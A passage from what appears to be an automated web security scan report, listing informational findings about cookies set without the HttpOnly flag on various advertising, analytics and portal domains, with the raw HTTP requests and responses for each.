Host: consumershealthyliving.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:31:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: af0de5e19d0aeec9236a3a01ce912df8=7bv015kl0m1jt0vltq8jl1b426; path=/
Last-Modified: Tue, 01 Feb 2011 15:31:20 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...

12.246. https://content.atomz.com/static/scode/H.15.1/snpall/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://content.atomz.com
Path:	/static/scode/H.15.1/snpall/s_code.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

v1stsp=E67B5206FBADB2C7; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.atomz.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /static/scode/H.15.1/snpall/s_code.js HTTP/1.1
Host: content.atomz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.247. http://cookex.amp.yahoo.com/v2/cexposer/SIG=13r09h5ct/*http:/ad.yieldmanager.com/imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cookex.amp.yahoo.com
Path:	*/v2/cexposer/SIG=13r09h5ct/http:/ad.yieldmanager.com/imp**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

B=4dl1ead6kjbgp&b=3&s=ii; expires=Tue, 02-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.248. http://cspix.media6degrees.com/orbserv/hbpix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cspix.media6degrees.com
Path:	/orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

acs=015020a0e0f0g1lebnnsxzt11o9ctxzt11o9ctxzt11kzqpxzt11o9ct; Domain=media6degrees.com; Expires=Mon, 01-Aug-2011 15:14:45 GMT; Path=/
adh=1lf17qo160226030103i01pznOhAUUE00cpvo3fus0122d01zfQfEf5HA000000; Domain=media6degrees.com; Expires=Mon, 01-Aug-2011 15:14:45 GMT; Path=/
clid=2lebnns011706ch47d7o8wtv1o9ct00u0x010602201; Domain=media6degrees.com; Expires=Mon, 01-Aug-2011 15:14:45 GMT; Path=/
ipinfo=2lfzx0l0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; Domain=media6degrees.com; Expires=Mon, 01-Aug-2011 15:14:45 GMT; Path=/
orblb=2lfk1rn012dh10u0100000; Domain=media6degrees.com; Expires=Mon, 01-Aug-2011 15:14:45 GMT; Path=/
rdrlst=40x07dpletz4d0000000q0x010o2ylebnns0000000u0x010mmnlebnns0000000u0x010xo1lebnns0000000u0x010x1blebnns0000000u0x010eh5lf17qf0000000m0x0106bylemlne0000000s0x010w3clebnns0000000u0x0107gmlebnns0000000u0x010jv6lebnns0000000u0x010j4ilew2e20000000o0x010xthlebnns0000000u0x010fullf8gij0000000i0x011196lfzx0l000000010x0100c9lfk1rn0000000f0x010jillebnns0000000u0x010fuqlegh2b0000000t0x010b6mlf17qk0000000l0x010mz1lebnns0000000u0x010cajlfk1rn0000000f0x010p7vlebnns0000000u0x0107vglfk1rn0000000f0x010xvslebnns0000000u0x010xuklebnns0000000u0x010x1jlebnns0000000u0x010jk7lebnns0000000u0x010cbnlfk1rn0000000f0x010yiplebnns0000000u0x010yh0lebnns0000000u0x010xwflebnns0000000u0x010e4vlebnns0000000u0x010jwblfk1rn0000000f0x010xwblebnns0000000u0x01; Domain=media6degrees.com; Expires=Mon, 01-Aug-2011 15:14:45 GMT; Path=/
sglst=2140s8dtletz4d0pqa500a0l000400100a70lebnns181qq00e0l00040010061gletz4d0pqa500a0l0004001005b0lf17qo0000000k0x010602201ag2leqh1919fzc00r0x01060220182gletz4d0pqa500a0l0004001009zdlebnns181qq00e0l00040010082hlebnns1o9ct00u0x0106022015q7letz4d0pqa500a0l000400100a6slebnns181qq00e0l000400100achlebnns181qq00e0l0004001007x9lebnns181qq00e0l000400100b1alfjpei0g7m300g0x010602201820lebnns181qq00e0l000400100b0olfjpei0g7m300g0x010602201ab4lebnns1o9ct00u0x0106022019szlebnns1o9ct00u0x0106022018wklebnns181qq00e0l000400100923lebnns181qq00e0l000400100ahllebnns181qq00e0l0004001000tllegh2b1jfya00t0x010602201al1letz4d0pqa500a0l0004001008lllebnns181qq00e0l000400100abulebnns181qq00e0l0004001005q8lebnns1o9ct00f0x0106012017y2lebnns181qq00e0l0004001008bgletz4d0pqa500a0l000400100b0clfjpei0g7m300g0x010602201b08lfjpei0g7m300g0x01060220140slebnns181qq00e0l00040010045mlfdxmc0000000h0x010602201a97lebnns181qq00e0l000400100ah4lebnns181qq00e0l0004001003s4letz4d0pqa500a0l00040010040uletz4d0pqa500a0l000400100acdlebnns181qq00e0l000400100aanlebnns181qq00e0l0004001009atlebnns181qq00e0l00040010086zlebnns181qq00e0l000400100ac3letz4d0pqa500a0l000400100; Domain=media6degrees.com; Expires=Mon, 01-Aug-2011 15:14:45 GMT; Path=/
vstcnt=3lebnns031l034e206123s181qq1845a1847x1845b1847u1847e1847k1847y1843w1844k184621845j1844p184551843s1847h1846q1844z184871846u184571843u18486184741846t1846l1845r1842z185k81848f1844n1844d184781846a1845v1846j1846k184801845s1843g1847a1843d184841846r1845y1844l1847i1847r1847p184541843r1845i1844y1844r1842x184811846o1844u1844s1847b1843k1843n1848a1845q1845n1845c1842t1844j1845e1845g184821846p184301847f1844c1847t1843c1843j1848b1847z1842u1843p184851846s1845f1845h18435184371846b1843o1845m1847s1848g1844g184561843t1847c1847g1843f1844a1847v1843m1844m184721845p1848e1844q1848c1843h1842y1847d1848d1844t1845x1847q1845k184711845o1846i1844f184791845w1845d184581844h1843v1847o18434184691845t184531844w1844e184881846v1844v4fhux122s000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru00000000000000000000000004esx7120104tej0r023ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z4nssk122m1boph1c4wn1bw2l1bw321bw2o1bw501bw3n1bw4o1bw3c1bw301bw5f1bw4e1bw381bw3l1bw2m1bw2c1bw351bw481bw2v1bw4h1bw4x1bw4b1bw361bw3z1bw4f1bw4w1bw4g1bw331bw431bw2q1bw4z1bw2b1bw441bw2r1bw5e1bw3f1bw521bw3p1bw5a1bw311bw4r1bw5d1bw5j1bw421bw2p1bw3x1bw5g1bw2i1bw4a1bw3b1bw531bw4p1bw3q1bw541bw3r1bw4q1bw4j1bw461bw2t1bw3m1bw4y1bw4s1bw2z1bw4c1bw2k1bw3v1bw4i1bw4t1bw3a1bw451bw2s1bw2j1bw4n1bw3e1bw591bw3w1bw401bw2n1bw3u1bw341bw4u1bw3k1bw491bw2w1bw5b1bw561bw3t1bw511bw551bw3s1bw471bw2u1bw5i1bw4l1o018EstvP2qn11011o9ct; Domain=media6degrees.com; Expires=Mon, 01-Aug-2011 15:14:45 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.249. http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ctix8.cheaptickets.com
Path:	/dcs4mzzicc2ep3maahjx8kl5c_7e2i/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zOTUzNzkwNzIwLjMwMTI1NTU1AAAAAAACAAAAPXQAADMlSE0zJUhNKbsAAAGdRE0BnURNAQAAABQuAAAzJUhNMyVITQAAAAA-; path=/; expires=Fri, 29-Jan-2021 15:22:27 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs4mzzicc2ep3maahjx8kl5c_7e2i/dcs.gif?&dcsdat=1296573790778&dcssip=www.orbitz.com&dcsuri=/&page=/&WT.tz=-6&WT.bh=9&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Orbitz%20Travel:%20Airline%20Tickets,%20Cheap%20Hotels,%20Car%20Rentals,%20Vacations%20%26%20Cruises&WT.js=Yes&WT.jv=1.5&WT.bs=1036x1012&WT.fi=Yes&WT.fv=10.1&WT.dl=0&WT.sv=egapp30p&WT.wtsv=1&WT.co_f=173.193.214.243-3953790720.30125555&WT.vt_f_tlh=1296342267&WT.vt_f_tlv=1296342267&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_sid=173.193.214.243-3953790720.30125555.1296573790782&hostname=www.orbitz.com&tab=QS&strf=7&b=A&wsid=265DA875C314B0C54855FC80AB1B1D8C&dsrc=7&pos=ORBC&ASimp=1&wtEvtSrc=www.orbitz.com/ HTTP/1.1
Host: ctix8.cheaptickets.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zOTUzNzkwNzIwLjMwMTI1NTU1AAAAAAACAAAAPXQAAA0jQk2xH0JNKbsAAAGdRE0BnURNAQAAABQuAAABnURNAZ1ETQAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 15:22:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zOTUzNzkwNzIwLjMwMTI1NTU1AAAAAAACAAAAPXQAADMlSE0zJUhNKbsAAAGdRE0BnURNAQAAABQuAAAzJUhNMyVITQAAAAA-; path=/; expires=Fri, 29-Jan-2021 15:22:27 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

12.250. http://ctix8.cheaptickets.com/dcsdlg96i00000clc5ljt8xox_8x1x/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ctix8.cheaptickets.com
Path:	/dcsdlg96i00000clc5ljt8xox_8x1x/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zOTUzNzkwNzIwLjMwMTI1NTU1AAAAAAADAAAAPXQAAF8lSE0zJUhNKbsAAAGdRE0BnURN/ucAAGklSE1pJUhNAQAAABQuAABpJUhNMyVITQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsdlg96i00000clc5ljt8xox_8x1x/dcs.gif?&WT.co_f=173.193.214.243-3953790720.30125555&WT.vt_sid=173.193.214.243-3953790720.30125555.1296573790782&WT.Site=www.orbitz.com&WT.tz=-6&WT.bh=9&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=hotel100&WT.js=Yes&WT.jv=1.5&WT.bs=1036x1012&WT.fi=Yes&WT.fv=10.1&WT.dl=20&WT.wtsv=1&WT.vt_f_tlh=1296573845&hostname=www.orbitz.com&pos=ORB&b=A&wtEvtSrc=hotel100&owwPage=/hotels/&LNG=en_US&strf=7&tab=HOT&wsid=D1DA21DD44B66783CD13169E22B74D3D&pJS=325&pHT=365&pDM=369&pAgSt=411&pAgFn=607&pOL=8774&pUA=Mozilla/5.0%20(Windows;%20U;%20Windows%20NT%206.1;%20en-US)%20AppleWebKit/534.10%20(KHTML,%20like%20Gecko)%20Chrome/8.0.552.237%20Safari/534.10&pJSP=109&dcsdat=1296573845060&dcssip=www.orbitz.com&dcsuri=/hotels/&dcsqry=%3Fz=4fae%26r=1o&dcsref=http://www.orbitz.com/App/PerformMDLPDealsContent HTTP/1.1
Host: ctix8.cheaptickets.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/hotels/?z=4fae&r=1o
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zOTUzNzkwNzIwLjMwMTI1NTU1AAAAAAACAAAAPXQAAF8lSE0zJUhNKbsAAAGdRE0BnURNAQAAABQuAABfJUhNMyVITQAAAAA-

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Tue, 01 Feb 2011 15:23:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcsdlg96i00000clc5ljt8xox_8x1x/dcs.gif?dcsredirect=112&dcstlh=0&dcstlv=0&WT.co_f=173.193.214.243-3953790720.30125555&WT.vt_sid=173.193.214.243-3953790720.30125555.1296573790782&WT.Site=www.orbitz.com&WT.tz=-6&WT.bh=9&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=hotel100&WT.js=Yes&WT.jv=1.5&WT.bs=1036x1012&WT.fi=Yes&WT.fv=10.1&WT.dl=20&WT.wtsv=1&WT.vt_f_tlh=1296573845&hostname=www.orbitz.com&pos=ORB&b=A&wtEvtSrc=hotel100&owwPage=/hotels/&LNG=en_US&strf=7&tab=HOT&wsid=D1DA21DD44B66783CD13169E22B74D3D&pJS=325&pHT=365&pDM=369&pAgSt=411&pAgFn=607&pOL=8774&pUA=Mozilla/5.0%20(Windows;%20U;%20Windows%20NT%206.1;%20en-US)%20AppleWebKit/534.10%20(KHTML,%20like%20Gecko)%20Chrome/8.0.552.237%20Safari/534.10&pJSP=109&dcsdat=1296573845060&dcssip=www.orbitz.com&dcsuri=/hotels/&dcsqry=%3Fz=4fae%26r=1o&dcsref=http://www.orbitz.com/App/PerformMDLPDealsContent
Content-Length: 0
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zOTUzNzkwNzIwLjMwMTI1NTU1AAAAAAADAAAAPXQAAF8lSE0zJUhNKbsAAAGdRE0BnURN/ucAAGklSE1pJUhNAQAAABQuAABpJUhNMyVITQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"

12.251. http://ctix8.cheaptickets.com/dcsza35es100004br3bqwfzxk_6e6k/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ctix8.cheaptickets.com
Path:	/dcsza35es100004br3bqwfzxk_6e6k/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zOTUzNzkwNzIwLjMwMTI1NTU1AAAAAAADAAAAPXQAAMYlSE0zJUhNKbsAAD98SU0/fElN/ucAAJ8lSE1pJUhNAQAAABQuAAA/fElNP3xJTQAAAAA-; path=/; expires=Sat, 30-Jan-2021 15:46:07 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsza35es100004br3bqwfzxk_6e6k/dcs.gif?&dcsdat=1296661619087&dcssip=updates.orbitz.com&dcsuri=/&dcsref=http://burp/show/15&WT.tz=-6&WT.bh=9&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Orbitz%20Traveler%20Update%20-%20Travel%20Alerts,%20Flight%20Status,%20Travel%20News,%20Airport%20Guides,%20Airport%20Delays,%20Weather&WT.js=Yes&WT.jv=1.5&WT.bs=1036x1012&WT.fi=Yes&WT.fv=10.1&WT.dl=0&WT.wtsv=1&WT.co_f=173.193.214.243-3953790720.30125555&WT.vt_f_tlh=1296573936&WT.vt_f_tlv=1296573790&WT.vt_f_s=1&WT.vt_f_d=1&WT.vt_sid=173.193.214.243-3953790720.30125555.1296661619090&hostname=updates.orbitz.com&wtEvtSrc=updates.orbitz.com/ HTTP/1.1
Host: ctix8.cheaptickets.com
Proxy-Connection: keep-alive
Referer: http://updates.orbitz.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zOTUzNzkwNzIwLjMwMTI1NTU1AAAAAAADAAAAPXQAAMYlSE0zJUhNKbsAAAGdRE0BnURN/ucAAJ8lSE1pJUhNAQAAABQuAADGJUhNMyVITQAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:46:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0zOTUzNzkwNzIwLjMwMTI1NTU1AAAAAAADAAAAPXQAAMYlSE0zJUhNKbsAAD98SU0/fElN/ucAAJ8lSE1pJUhNAQAAABQuAAA/fElNP3xJTQAAAAA-; path=/; expires=Sat, 30-Jan-2021 15:46:07 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

12.252. http://deals.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://deals.msn.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=3f8fd347c99547099a4814fa8b9e7293; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=1D770C0684124A3E8436F4C065609D19; domain=.msn.com; expires=Sat, 20-Aug-2011 15:31:32 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: deals.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.253. http://developer.yahoo.com/yui/compressor/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developer.yahoo.com
Path:	/yui/compressor/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

B=d39814h6kj0v3&b=3&s=tc; expires=Tue, 02-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /yui/compressor/ HTTP/1.1
Host: developer.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.254. http://developers.facebook.com/plugins/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/plugins/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lsd=WT1SJ; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.255. http://dlvr.it/Djx2v previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dlvr.it
Path:	/Djx2v

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

dlvrId=8a5dcd6031823d5ee6b63fcce0c0e81b; expires=Thu, 03-Mar-2011 14:32:08 GMT; path=/; domain=dlvr.it

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Djx2v HTTP/1.1
Host: dlvr.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 01 Feb 2011 14:32:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.1
Set-Cookie: dlvrId=8a5dcd6031823d5ee6b63fcce0c0e81b; expires=Thu, 03-Mar-2011 14:32:08 GMT; path=/; domain=dlvr.it
Location: http://jobviewtrack.com/en-gb/job/f6f05a6415afa3c6228a8500239d47c4.html?affid=7b2e27d9738a79f5&l=Virginia%20Beach&lid=22462
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

12.256. http://dlvr.it/Djx6x previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dlvr.it
Path:	/Djx6x

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

dlvrId=7e122faad67ccbdab5a1d3dd824c5e50; expires=Thu, 03-Mar-2011 14:32:08 GMT; path=/; domain=dlvr.it

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Djx6x HTTP/1.1
Host: dlvr.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 01 Feb 2011 14:32:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.1
Set-Cookie: dlvrId=7e122faad67ccbdab5a1d3dd824c5e50; expires=Thu, 03-Mar-2011 14:32:08 GMT; path=/; domain=dlvr.it
Location: http://www.businesswire.com/news/home/20110120005733/en/IDEX-Corporation-Acquires-Advanced-Thin-Films-LLC
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

12.257. http://dm.demdex.net/pixel/10236 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.demdex.net
Path:	/pixel/10236

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DexLifeCycle=NEW01296659480101778|MTA4MDQ9MTo3NjI=|MA==|MA==|NjU4OTE0ODA=|MA==|MTA4MDQtMA==; path=/; expires=Sat, 30-Jan-21 15:11:20 GMT; domain=.dm.demdex.net
demdex=dv2:eLHun3HgfhcbrRmH3JUk3A==; path=/; expires=Sat, 30-Jan-21 15:11:20 GMT; domain=.demdex.net
dm=dv2:eLHun3HgfhcbrRmH3JUk3A==; path=/; expires=Sat, 30-Jan-21 15:11:20 GMT; domain=.dm.demdex.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.258. http://dpm.demdex.net/demdot.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dpm.demdex.net
Path:	/demdot.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DexLifeCycle=NEW01296659488235797|MA==|MA==|MA==|NjU4OTE0ODg=|MA==|MA==; path=/; expires=Sat, 30-Jan-21 15:11:28 GMT; domain=.dpm.demdex.net
demdex=dv2:eLHun3HgfhcbrRmH3JUk3A==; path=/; expires=Sat, 30-Jan-21 15:11:28 GMT; domain=.demdex.net
dpm=dv2:eLHun3HgfhcbrRmH3JUk3A==; path=/; expires=Sat, 30-Jan-21 15:11:28 GMT; domain=.dpm.demdex.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.259. http://ds.addthis.com/red/psi/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/p.json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; Domain=.addthis.com; Expires=Mon, 02 May 2011 15:32:27 GMT; Path=/
di=%7B%7D..1296574347.19F|1296574347.19A; Domain=.addthis.com; Expires=Thu, 31-Jan-2013 10:47:39 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /red/psi/p.json HTTP/1.1
Host: ds.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.260. http://ds.addthis.com/red/psi/sites/www.ehow.com/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.ehow.com/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296659685.60|1296659685.66; Domain=.addthis.com; Expires=Fri, 01-Feb-2013 00:28:04 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.261. http://edge.quantserve.com/quant.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://edge.quantserve.com
Path:	/quant.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

mc=4d481969-16684-f7cfe-c8df4; expires=Tue, 01-Feb-2021 14:32:09 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /quant.js HTTP/1.1
Host: edge.quantserve.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.262. http://editorial.autos.msn.com/articles/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.msn.com
Path:	/articles/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=b9bfa5195ac242b6b3c0e65032e98705; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=4121B0CBC49B4A6EBD8938C8585174FE; domain=.autos.msn.com; expires=Sat, 20-Aug-2011 15:32:27 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /articles/default.aspx HTTP/1.1
Host: editorial.autos.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.263. http://editorial.autos.msn.com/blogs/autosblog.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.msn.com
Path:	/blogs/autosblog.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

MC1=V=3&GUID=359d35043ed54139853a37a4e289217d; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=E8F56045ECCA4D669B1521C01014A312; domain=.autos.msn.com; expires=Sat, 20-Aug-2011 15:32:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blogs/autosblog.aspx HTTP/1.1
Host: editorial.autos.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.264. http://editorial.autos.msn.com/media/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://editorial.autos.msn.com
Path:	/media/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

